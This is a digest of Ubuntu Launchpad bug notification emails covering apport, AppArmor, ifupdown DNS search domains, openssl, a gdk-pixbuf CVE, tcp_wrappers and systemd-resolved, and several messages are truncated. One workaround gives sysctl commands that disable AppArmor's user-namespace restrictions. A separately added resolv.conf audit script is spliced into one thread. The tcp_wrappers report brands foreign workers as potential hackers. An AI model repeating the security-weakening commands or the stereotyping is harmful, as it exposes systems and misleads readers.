  flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid mpx rdseed adx smap clflushopt intel_pt xsaveopt xsavec xgetbv1 xsaves dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp md_clear flush_l1d arch_capabilities
  bugs : cpu_meltdown spectre_v1 spectre_v2 spec_store_bypass l1tf mds swapgs itlb_multihit srbds mmio_stale_data retbleed gds
  bogomips : 5199.98
  clflush size : 64
  cache_alignment : 64
  address sizes : 39 bits physical, 48 bits virtual
  power management:
  ...
[Touch-packages] [Bug 2063884] [NEW] ubuntu-bug can't report bugs in Ubuntu Pro packages
Public bug reported:

Hello, ubuntu-bug can't report bugs in packages provided by Ubuntu Pro.

For example, I have lynx installed, which has an update issued through esm-apps:

$ dpkg -l lynx | grep ^ii
ii lynx 2.9.0dev.5-1ubuntu0.1~esm1 amd64 classic non-graphical (text-mode) web browser

$ ubuntu-bug lynx

*** Collecting problem information

The collected information can be sent to the developers to improve the application. This might take a few minutes.
.

*** Problem in lynx

The problem cannot be reported:

This is not an official Ubuntu package. Please remove any third party package and try again.

Press any key to continue...
^?
No pending crash reports. Try --help for more information.

** Affects: apport (Ubuntu)
     Importance: Undecided
         Status: New

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/2063884

Title: ubuntu-bug can't report bugs in Ubuntu Pro packages

Status in apport package in Ubuntu: New
[Touch-packages] [Bug 2063536] Re: flickering screen
** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/2063536

Title: flickering screen
Status in xorg package in Ubuntu: New

Bug description: automatically refresh and hang
[Touch-packages] [Bug 2056627] Re: PHPStorm crashes when opening a project
The unfortunate thing with AppImage is that there's no easy default path that can be confined as can be done for other systems. So you'll need to construct an AppArmor profile for your applications following the instructions at https://discourse.ubuntu.com/t/noble-numbat-release-notes/39890#unprivileged-user-namespace-restrictions-15

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2056627

Title: PHPStorm crashes when opening a project
Status in apparmor package in Ubuntu: Confirmed

Bug description:

Filing mostly in case anyone else hits this and is looking for workarounds:

Since the Update to 24.04 PHPStorm crashes on open for me. I think when it tries to preview a markdown file, like a README.md which is shown when opening a project.

```
[0309/094602.913394:FATAL:setuid_sandbox_host.cc(158)] The SUID sandbox helper binary was found, but is not configured correctly. Rather than run without sandboxing I'm aborting now. You need to make sure that /home/user/bin/phpstorm/jbr/lib/chrome-sandbox is owned by root and has mode 4755.
```

Workaround 1 (won't persist reboots, needs root):

```
sudo sysctl -w kernel.apparmor_restrict_unprivileged_unconfined=0
sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0
```

Workaround 2 (persists and doesn't need root): thanks to https://youtrack.jetbrains.com/issue/IDEA-313202/IDE-crashes-due-to-chrome-sandbox-is-owned-by-root-and-has-mode-error-when-IDE-is-launching-the-JCEF-in-a-sandbox#focus=Comments-27-7059083.0-0

* Run `/bin/phpstorm.sh dontReopenProjects` (to avoid it crashing on start)
* ctrl+shift+a
* type "Registry..." and select it
* disable the "ide.browser.jcef.sandbox.enable" option
* Restart phpstorm
[Touch-packages] [Bug 1976484] Re: never sound ubuntu 20.04 22.04 alsamixer 1.2.6 card sof-hda-dsp
** Information type changed from Private Security to Public

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to alsa-driver in Ubuntu.
https://bugs.launchpad.net/bugs/1976484

Title: never sound ubuntu 20.04 22.04 alsamixer 1.2.6 card sof-hda-dsp
Status in alsa-driver package in Ubuntu: New

Bug description: no sound ubuntu 20.04 and 22.04 alsamixer 1.2.6 card sof-hda-dsp ships Intel Broxton HDMI, with and no pulseaudio
[Touch-packages] [Bug 1978351] Re: MITM vector: ifupdown puts .domains TLD in resolv.conf
Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

** Information type changed from Private Security to Public Security
** Tags added: community-security

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ifupdown in Ubuntu.
https://bugs.launchpad.net/bugs/1978351

Title: MITM vector: ifupdown puts .domains TLD in resolv.conf
Status in ifupdown package in Ubuntu: New

Bug description:

The bug described in https://bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/1907878?comments=all is a security vulnerability because DNS names that would normally fail are now attempted as "foo.domains".

".domains" is a real TLD, with the registrar "Donuts, Inc." based in Bellevue, WA. "google.com.domains" is registered, for example. So is "test.domains".

For users with ifupdown, any Internet request (especially that does not involve some cryptographic payload and destination signature verification) is potentially sending packets to an unintended audience. It's impossible to say, but likely, that malicious registrants are squatting sensitive and common names in the .domains TLD.

The ifupdown package is still used by some cloud providers that have not adopted netplan. This vulnerability affects 22.04 and potentially other releases. This issue has not been corrected in 0.8.36+nmu1ubuntu4.

With 0.8.36+nmu1ubuntu3 and after an update to 0.8.36+nmu1ubuntu4, the resolv.conf looks like the following (which is vulnerable to mitm attacks):

```
root@foo:~# cat /etc/resolv.conf
# This is /run/systemd/resolve/stub-resolv.conf managed by man:systemd-resolved(8).
# Do not edit.
#
# This file might be symlinked as /etc/resolv.conf. If you're looking at
# /etc/resolv.conf and seeing this text, you have followed the symlink.
#
# This is a dynamic resolv.conf file for connecting local clients to the
# internal DNS stub resolver of systemd-resolved. This file lists all
# configured search domains.
#
# Run "resolvectl status" to see details about the uplink DNS servers
# currently in use.
#
# Third party programs should typically not access this file directly, but only
# through the symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a
# different way, replace this symlink by a static file or a different symlink.
#
# See man:systemd-resolved.service(8) for details about the supported modes of
# operation for /etc/resolv.conf.

nameserver 127.0.0.53
options edns0 trust-ad
search DOMAINS
```
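The search-list expansion behind the `search DOMAINS` line reported above, as an added example that is not part of the bug report or of ifupdown: this Python script parses a resolv.conf, flags search entries that are a single label, and lists the names a resolver following the ndots/search rules of resolv.conf(5) would try. The function names, the embedded sample and the probe names are constructed for illustration.

```python
"""Audit resolv.conf search lists for bare-label entries (added example)."""

# Constructed sample: the active lines of the resolv.conf quoted in the report.
SAMPLE_RESOLV_CONF = """\
# This is /run/systemd/resolve/stub-resolv.conf managed by man:systemd-resolved(8).
# Do not edit.
nameserver 127.0.0.53
options edns0 trust-ad
search DOMAINS
"""


def parse_resolv_conf(text):
    """Return (search_list, ndots) from resolv.conf text.

    Per resolv.conf(5): '#' or ';' in the first column starts a comment, the
    last 'search' or 'domain' line wins, and ndots defaults to 1 (capped at 15).
    """
    search, ndots = [], 1
    for line in text.splitlines():
        if not line or line[0] in "#;":
            continue
        fields = line.split()
        if not fields:
            continue
        keyword, args = fields[0], fields[1:]
        if keyword == "search":
            search = args
        elif keyword == "domain":
            search = args[:1]
        elif keyword == "options":
            for opt in args:
                value = opt[len("ndots:"):]
                if opt.startswith("ndots:") and value.isdigit():
                    ndots = min(int(value), 15)
    return search, ndots


def _label(domain):
    """Normalise a search entry: no trailing dot, lower case (DNS ignores case)."""
    return domain.rstrip(".").lower()


def bare_label_search_domains(search):
    """Search entries made of one label, such as 'DOMAINS'.

    A one-label suffix is a top-level domain, so every expanded name lands in
    a public namespace that the host's operator does not control.
    """
    return [d for d in search if _label(d) and "." not in _label(d)]


def candidate_queries(name, search, ndots=1):
    """Fully qualified names tried, in order, for `name`.

    Model of the resolv.conf(5) rule: a name with a trailing dot is used as is;
    a name with at least `ndots` dots is tried as given first and then with
    each search suffix; a name with fewer dots gets the suffixes first.
    """
    if name.endswith("."):
        return [name.lower()]
    absolute = name.lower() + "."
    expanded = [f"{name.lower()}.{_label(d)}." for d in search if _label(d)]
    if name.count(".") >= ndots:
        return [absolute] + expanded
    return expanded + [absolute]


def audit(text, probe_names):
    """Report bare-label search entries and the probe lookups they redirect."""
    search, ndots = parse_resolv_conf(text)
    risky = bare_label_search_domains(search)
    suffixes = tuple("." + _label(d) + "." for d in risky)
    redirected = {}
    for name in probe_names:
        own = name.lower().rstrip(".") + "."  # the name exactly as requested
        hits = [q for q in candidate_queries(name, search, ndots)
                if q != own and q.endswith(suffixes)]
        if hits:
            redirected[name] = hits
    return {"search": search, "risky": risky, "redirected": redirected}


if __name__ == "__main__":
    # Probe names are constructed; "google.com" is the example the report cites.
    report = audit(SAMPLE_RESOLV_CONF, ["foo", "google.com", "google.com."])
    print("search list:", report["search"])
    for domain in report["risky"]:
        print(f"WARNING: search entry {domain!r} is a bare label (a TLD)")
    for name, queries in report["redirected"].items():
        print(f"{name!r} may also be looked up as: {', '.join(queries)}")
```

Run against a host's real file with `audit(open("/etc/resolv.conf").read(), [...])`; an empty `risky` list means no search entry is a bare label.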
[Touch-packages] [Bug 1978351] Re: MITM vector: ifupdown puts .domains TLD in resolv.conf
Thanks Marques, do you know if this affects Debian as well? I wonder if they already saw this and fixed it, or if they don't yet know about it.

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ifupdown in Ubuntu.
https://bugs.launchpad.net/bugs/1978351

Title: MITM vector: ifupdown puts .domains TLD in resolv.conf
Status in ifupdown package in Ubuntu: New
[Touch-packages] [Bug 1981362] Re: rehash command not working on armhf architecture inside chroot
Hello Oscar, I didn't think systemd-nspawn would do architecture emulation on its own. Did you perhaps set up qemu-user-static yourself on systems where this is working, but not set it up on the system where it is failing? Or am I missing a new systemd-nspawn feature?

Thanks

** Changed in: openssl (Ubuntu)
Status: New => Incomplete

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1981362

Title: rehash command not working on armhf architecture inside chroot
Status in openssl package in Ubuntu: Incomplete

Bug description:

Hi, I found a possible bug in the `openssl rehash` command: it won't do anything while running inside an armhf chroot with an amd64 host architecture.

How to reproduce (confirmed on focal and hirsute):

1. Build an armhf chroot environment: `debootstrap --arch armhf --foreign focal `
2. Go inside chroot (using systemd-nspawn): `systemd-nspawn -D `
3. Complete debootstrap second stage: `/debootstrap/debootstrap --second-stage`
4. Run rehash in system certs dir: `openssl rehash -n -v /etc/ssl/certs`
5. Rehash shows nothing was done

```
root@ubuntuarm:~# openssl rehash -n -v /etc/ssl/certs
Doing /etc/ssl/certs
root@ubuntuarm:~#
```

In jammy there is no problem (openssl 3.0.2).

```
$ lsb_release -rd
Description: Ubuntu 20.04.4 LTS
Release: 20.04
$ apt-cache policy openssl
openssl:
  Installed: 1.1.1f-1ubuntu2.16
  Candidate: 1.1.1f-1ubuntu2.16
  Version table:
 *** 1.1.1f-1ubuntu2.16 500
        500 http://co.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
        500 http://security.ubuntu.com/ubuntu focal-security/main amd64 Packages
        100 /var/lib/dpkg/status
     1.1.1f-1ubuntu2 500
        500 http://co.archive.ubuntu.com/ubuntu focal/main amd64 Packages
```

Full console session (on an armhf chroot, arm64 host arch):

```
root@ubuntuarm:~# openssl rehash -n -v /etc/ssl/certs
Doing /etc/ssl/certs
root@ubuntuarm:~# openssl version -a
OpenSSL 1.1.1f 31 Mar 2020
built on: Mon Apr 20 11:53:50 2020 UTC
platform: debian-armhf
options: bn(64,32) rc4(char) des(long) blowfish(ptr)
compiler: gcc -fPIC -pthread -Wa,--noexecstack -Wall -Wa,--noexecstack -g -O2 -fdebug-prefix-map=/build/openssl-uC90dH/openssl-1.1.1f=. -fstack-protector-strong -Wformat -Werror=format-security -DOPENSSL_TLS_SECURITY_LEVEL=2 -DOPENSSL_USE_NODELETE -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DAES_ASM -DBSAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DNDEBUG -Wdate-time -D_FORTIFY_SOURCE=2
OPENSSLDIR: "/usr/lib/ssl"
ENGINESDIR: "/usr/lib/arm-linux-gnueabihf/engines-1.1"
Seeding source: os-specifi
root@ubuntuarm:~# uname -a
Linux ubuntuarm 5.4.0-117-generic #132-Ubuntu SMP Thu Jun 2 00:39:06 UTC 2022 armv7l armv7l armv7l GNU/Linux
```
[Touch-packages] [Bug 1981807] Re: qt5-network openssl3 armhf does not support tls1.3
** Information type changed from Private Security to Public Security

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to qtbase-opensource-src in Ubuntu.
https://bugs.launchpad.net/bugs/1981807

Title: qt5-network openssl3 armhf does not support tls1.3
Status in qtbase-opensource-src package in Ubuntu: New

Bug description:

lsb_release
Description: Ubuntu 22.04 LTS
Release: 22.04

libqt5network5/jammy,now 5.15.3+dfsg-2 armhf
libssl3/jammy-updates,jammy-security,now 3.0.2-0ubuntu1.6 armhf

the qt5 armhf version shipped with ubuntu jammy has a regression in tls1.3 support (simply missing in runtime). openssl supports tls1.3, so the underlying library works. x86_64 is obviously not affected

the short sample applications writes -1 on armhf, 15 on x86_64 (unknown protocol vs tls1.3)

```
QSslSocket* s = new QSslSocket();
QSslConfiguration cfg = s->sslConfiguration();
cfg.setProtocol(QSsl::TlsV1_3OrLater);
s->setSslConfiguration(cfg);
s->connectToHostEncrypted("tls13-enabled.server",443);
s->waitForConnected();
printf("%d\n",s->sessionProtocol());
```

marking it as security since the most secure tls protocol is not used on some platforms
[Touch-packages] [Bug 1982898] Re: CVE-2021-46829: Buffer overwrite in io-gif-animation.c composite_frame() in gdk-pixbuf
** Description changed: [Impact] * A buffer overwrite exists in gdk-pixbuf's thumbnailer. * The GIF loader runs out of memory with specifically crafted files with bad frame data (and images with its sizes) over the integer limit. * After gdk-pixbuf-thum runs out of memory, other apps can and on low RAM systems like my old iMac, the system can completely run out of memory. * Or, in other ways, bad gif files in other applications can open the door for exploits. * Any app using gdk-pixbuf is affected, mainly file managers and image viewers. [Test Plan] * Take the POC's - they can be found in the issue in the GNOME repo * Open them in an application that uses gdk-pixbuf. I have managed to produce reactions with: - Nautilus, GNOME's file manager - Nemo, Cinnamon's file manager - Thunar, XFCE's file manager, which has its own thumbnailere (tumbler) that also inevitably fails and crashes - PCManFM, LXDE's file manager which straight up crashes - - Caja, MATE's file manager causes libpixbufloader-gif to segfault (app still usable, no memory issues) - - Eye of GNOME (eog) triggers the segfault in syslog + - Caja, MATE's file manager causes libpixbufloader-gif to segfault (app still usable, no memory issues) + - Eye of GNOME (eog) triggers the segfault in syslog * If you or the system couldn't tell something is wrong, cat /var/log/syslog and enjoy the segfaults or out of memory warnings or even kernel spam. [Where problems could occur] * The patch itself is simple, but since gdk-pixbuf is often used with GTK apps a mistake here could be problematic. * It is possible, and has happened in the past (which has been patched) that other bad GIFs can cause other crashes. 
* That patch is essentially overflow checks - changes with GLib (GNOME's, not to be confused with glibc) and the functions used in not only the patch but all of gdk-pixbuf can cause problems * Other failures to properly handle GIFs and broken or intentionally tampered GIFs can continue and always will open the door for security holes for other bugs * Again, overall a simple patch but as long as the GIFs remain handled properly, and no changes to the GLib functions are made and to other apps that use gdk-pixbuf (and assuming are not affected by the change and still work), the patch does not have much regression potential. [Other Info] * Besides Buffer overwrite/overflow issues, as aforementioned out of memory errors can happen. * Files attached are examples or crashes * Again, all apps using gdk-pixbuf are affected * https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/merge_requests/121/ - * https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/190https://github.com/pedrib/PoC/blob/master/fuzzing/CVE-2021-46829/CVE-2021-46829.md + * https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/190 + * https://github.com/pedrib/PoC/blob/master/fuzzing/CVE-2021-46829/CVE-2021-46829.md ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: libgdk-pixbuf2.0-0 2.40.0+dfsg-3ubuntu0.2 ProcVersionSignature: Ubuntu 5.15.0-43.46~20.04.1-generic 5.15.39 Uname: Linux 5.15.0-43-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.24 Architecture: amd64 CasperMD5CheckResult: skip CurrentDesktop: X-Cinnamon Date: Tue Jul 26 19:33:41 2022 InstallationDate: Installed on 2021-11-24 (244 days ago) InstallationMedia: ubuntucinnamonremix "@BASECODENAME" (20210826) SourcePackage: gdk-pixbuf UpgradeStatus: No upgrade log present (probably fresh install) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to gdk-pixbuf in Ubuntu. 
https://bugs.launchpad.net/bugs/1982898 Title: CVE-2021-46829: Buffer overwrite in io-gif-animation.c composite_frame() in gdk-pixbuf Status in gdk-pixbuf package in Ubuntu: In Progress Bug description: [Impact] * A buffer overwrite exists in gdk-pixbuf's thumbnailer. * The GIF loader runs out of memory with specifically crafted files with bad frame data (and images with its sizes) over the integer limit. * After gdk-pixbuf-thum runs out of memory, other apps can and on low RAM systems like my old iMac, the system can completely run out of memory. * Or, in other ways, bad gif files in other applications can open the door for exploits. * Any app using gdk-pixbuf is affected, mainly file managers and image viewers. [Test Plan] * Take the POC's - they can be found in the issue in the GNOME repo * Open them in an application that uses gdk-pixbuf. I have managed to produce reactions with: - Nautilus, GNOME's file manager - Nemo, Cinnamon's file manager - Thunar, XFCE's file manager, which has its own thumbnailere (tumbler) that also inevitably fails and crashes - PCManFM, LXDE's file manager which straight up crashes - Caja, MATE's file manager causes libp
[Touch-packages] [Bug 1958055] Re: sudo apport-kde is in a different design (stripped XDG_CURRENT_DESKTOP)
I'm a bit surprised ubuntu-bug shows a GUI when run under sudo at all. I think I'd expect the usual X11 "no cookies" failure to connect. Running X programs as another user is bound to be trouble. Perhaps ubuntu-bug should quit immediately if it detects running via sudo, su, etc things?

Thanks

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to sudo in Ubuntu.
https://bugs.launchpad.net/bugs/1958055

Title: sudo apport-kde is in a different design (stripped XDG_CURRENT_DESKTOP)
Status in sudo package in Ubuntu: Confirmed

Bug description:

Running ubuntu-bug as normal user has the correct theme (see screenshots attached to bug #1881640), but running "sudo ubuntu-bug" has a different, non-matching theme (see attached screenshot).

This problem can be reproduced by running a KDE application on Ubuntu Desktop (GNOME):

1. Launch ubuntu-22.04-desktop-amd64.iso
2. Install apport-kde
3. Run: /usr/share/apport/apport-kde -f
4. Run: sudo /usr/share/apport/apport-kde -f
5. Compare both windows. They have different icons and font size.

Same result with KDE:

1. Use kubuntu-22.04-desktop-amd64.iso
2. Run ubuntu-bug -f
3. Run: sudo ubuntu-bug -f

[Analysis]

Qt needs XDG_CURRENT_DESKTOP to be set to determine the correct theme, but XDG_CURRENT_DESKTOP is not in the list of environment variables to preserve (and not in env_keep in /etc/sudoers).

[Workaround]

Prevent sudo from dropping XDG_CURRENT_DESKTOP by running:

```
sudo XDG_CURRENT_DESKTOP=$XDG_CURRENT_DESKTOP /usr/share/apport/apport-kde -f
```

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: apport 2.20.9-0ubuntu7.27
ProcVersionSignature: Ubuntu 5.4.0-94.106~18.04.1-generic 5.4.157
Uname: Linux 5.4.0-94-generic i686
ApportVersion: 2.20.9-0ubuntu7.27
Architecture: i386
CurrentDesktop: KDE
Date: Sun Jan 16 05:04:24 2022
InstallationDate: Installed on 2022-01-15 (0 days ago)
InstallationMedia: Kubuntu 18.04.5 LTS "Bionic Beaver" - Release i386 (20200806.1)
PackageArchitecture: all
SourcePackage: apport
UpgradeStatus: No upgrade log present (probably fresh install)
[Touch-packages] [Bug 1839598] Re: tcp_wrappers does not whitelisting of domains, vs IPs
** Changed in: tcp-wrappers (Ubuntu)
Status: New => Won't Fix

--
You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to tcp-wrappers in Ubuntu.
https://bugs.launchpad.net/bugs/1839598

Title: tcp_wrappers does not whitelisting of domains, vs IPs
Status in tcp-wrappers package in Ubuntu: Won't Fix

Bug description:

TCP Wrappers (also known as tcp_wrappers) is a host-based networking ACL system, used to filter network access to Internet Protocol servers. It allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens on which to filter for access control purposes.

The original code was written by Wietse Venema in 1990. He maintained it until 1995, and on June 1, 2001, released it under its own BSD-style license. The tarball includes a library named Libwrap that implements the actual functionality. I had an email conversation with him that led nowhere. He does not agree with my request for a redesign.

Very concisely, there is no way as of now to whitelist a domain, vs an IP address. You need to know the IP address to which the domain resolves to beforehand, which makes domain updates impossible to process. This causes tremendous operational problems when the person you need to give access to has an IP address that changes often.

But I need to digress. Every foreign worker is a potential hacker, for there is no way to perform a security check on her/him. Many companies use them nevertheless because of the low cost. I know a company that hires North Korean engineers working out of mainland China. They log in for legitimate purposes to American corporate servers. They actually live in North Korea and are forced to go back home every 3 weeks. They only have access to dynamic IP addresses, where a PTR record does not exist, thus, no reverse-hostname is possible. As a fact: no dynamic IP address has a corresponding PTR record.

The question is how to whitelist a remote worker's IP automatically. This issue cannot be easily solved since commercial VPNs do not guarantee that the same IP will be offered on the next connection.

Many small companies that hire foreign workers end up creating fence servers, but that is exponentially more insecure since now you have a potential hacker sitting comfortably inside your firewall, behind your line of defense. Your network may have access to other companies' networks, all the way up to a power station or a government facility, maybe a nuclear facility. A very somber scenario.

Since Libwrap is the ultimate defense to keep hackers from controlling your servers, it should ONLY verify if an incoming connection resolves to a domain listed in /etc/hosts.allow. It does not. Prior, it performs a hostname check that invariably fails unless the pair IP address/domain exists in /etc/hosts, but of course that information changes sometimes hourly. As a result of this problem, you cannot use it as a gatekeeper for remote access from dynamic IP addresses, increasing your level of insecurity.

As I said, I explained all these ideas to the author, Wietse, without success. He insisted that using a public key was how you protect servers. I disagree. Without Libwrap, which means IP whitelisting, a simple public key mechanism is suicidal. It is very easy to see why. In a first step, a hacker steals the pair public-private key from a box which has legitimate access to your network. Then he uses the pair in another box located in his country, from which he will access your network as if he were the legitimate client or worker. It happened to me already.

Libwrap applied to a domain plus public key will perform infinitely better than a public key alone. In fact, public key alone should not be used at all. This is obvious since by using it, you are delegating your security to the box you are allowing to connect, so your entire network is now as secure as your client or worker's home network, which you don't control. You just opened the doors of your company wide-open.

What I suggest is to modify Libwrap so a domain listed in /etc/hosts.allow would work for real, just performing a simple DNS lookup that will match the IP address to the domain. Right now, this is impossible.
[Touch-packages] [Bug 1987228] Re: Bug display when turning to hibernation
** Information type changed from Private Security to Public Security ** Also affects: gnome-shell (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1987228 Title: Bug display when turning to hibernation Status in gnome-shell package in Ubuntu: New Status in xorg package in Ubuntu: New Bug description: When I put the computer to sleep, there are small display glitches for a few seconds. Then, when I wake from sleep mode, my desktop and opened windows show up for a few seconds before the login screen. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-46.49-generic 5.15.39 Uname: Linux 5.15.0-46-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: unknown Date: Mon Aug 22 00:22:25 2022 DistUpgraded: 2022-08-11 21:55:03,477 DEBUG Running PostInstallScript: '/usr/lib/ubuntu-advantage/upgrade_lts_contract.py' DistroCodename: jammy DistroVariant: ubuntu ExtraDebuggingInterest: Yes, including running git bisection searches GraphicsCard: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0126] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company 2nd Generation Core Processor Family Integrated Graphics Controller [103c:161c] InstallationDate: Installed on 2021-03-26 (513 days ago) InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1) MachineType: Hewlett-Packard HP EliteBook 8460p ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-46-generic root=UUID=c83ab0ab-bcc6-4f8e-a43f-c872be521021 ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: Upgraded to jammy on 2022-08-11 (10 days ago) dmi.bios.date: 02/13/2018 dmi.bios.release: 15.103 
[Touch-packages] [Bug 1988010] Re: systemd ignoring DHCP DNS servers and DNS servers set in Network Manager GUI
Hello Josh, which GUI are you using to change dns or dhcp settings? Thanks ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1988010 Title: systemd ignoring DHCP DNS servers and DNS servers set in Network Manager GUI Status in systemd package in Ubuntu: New Bug description: Hi there! I'm running ubuntu 22.04.1 LTS installed via the ISO image ubuntu-22.04.1-desktop-amd64.iso. This issue affects both the Live CD and installed operating system. I have configured my modem's DHCP server to push my adguard home DNS server (cloud-hosted) as the DNS for the network. I have an access point that is setup to do the same. With the Live CD and installed operating system, there is a local DNS server installed that runs on 127.0.0.1:53. Somehow this bypasses the DNS servers I've configured for the network and suddenly websites that have been blocked for being malicious or harmful are now accessible. There is no option in the installer or GUI to disable this. Changing the network DNS settings via the GUI of either the live cd or installation do not change the behavior and do not result in the specified DNS server(s) being used. The 127.0.0.1:53 server still overrides anything set in the GUI. The only way I have found to override this behavior is to edit /etc/systemd/resolved.conf: 1) uncomment DNSStubListener=yes 2) change yes to no 3) save file 4) run the following commands in terminal: sudo systemctl daemon-reload sudo systemctl restart systemd-networkd sudo systemctl restart systemd-resolved After doing so, the DNS servers that have been provided by DHCP are properly used. 
This is considered a security vulnerability due to there being no way for a normal user to change this setting without editing system configuration files and no warning given to the user that the settings they are applying in the GUI have not been applied due to this default configuration. This is considered a hack if this is the intentional configuration as it overrides network configuration options set by the DHCP server. I've resolved it for myself for now by making a custom iso image that removes this configuration by default and instead installs the /etc/systemd/resolved.conf file attached to this bug report. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: systemd 249.11-0ubuntu3.4 ProcVersionSignature: Ubuntu 5.15.0-46.49-generic 5.15.39 Uname: Linux 5.15.0-46-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Sun Aug 28 21:18:35 2022 InstallationDate: Installed on 2022-08-29 (0 days ago) InstallationMedia: Ubuntu 22.04.1 2022.08.28 LTS "Custom Jammy Jellyfish" (20220828) MachineType: Micro-Star International Co., Ltd. GS75 Stealth 9SG ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-46-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: systemd UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 03/26/2019 dmi.bios.release: 1.12 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: E17G1IMS.10C dmi.board.asset.tag: Default string dmi.board.name: MS-17G1 dmi.board.vendor: Micro-Star International Co., Ltd. dmi.board.version: REV:1.0 dmi.chassis.asset.tag: No Asset Tag dmi.chassis.type: 10 dmi.chassis.vendor: Micro-Star International Co., Ltd. 
[Touch-packages] [Bug 1988010] Re: systemd ignoring DHCP DNS servers and DNS servers set in Network Manager GUI
Cool, thanks Josh -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1988010 Title: systemd ignoring DHCP DNS servers and DNS servers set in Network Manager GUI Status in systemd package in Ubuntu: New
[Touch-packages] [Bug 1988588] Re: Xeon E3-1200 v2/3rd Gen Core processor Graphics Controller Drivers missing
** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1988588 Title: Xeon E3-1200 v2/3rd Gen Core processor Graphics Controller Drivers missing Status in xorg package in Ubuntu: New Bug description: Please upgrade the Ubuntu OS and provide Graphics drivers for Ubuntu 22. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-47.51-generic 5.15.46 Uname: Linux 5.15.0-47-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: pass CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Fri Sep 2 20:59:09 2022 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu ExtraDebuggingInterest: Yes, including running git bisection searches GraphicsCard: Intel Corporation Xeon E3-1200 v2/3rd Gen Core processor Graphics Controller [8086:0152] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Intel Corporation Xeon E3-1200 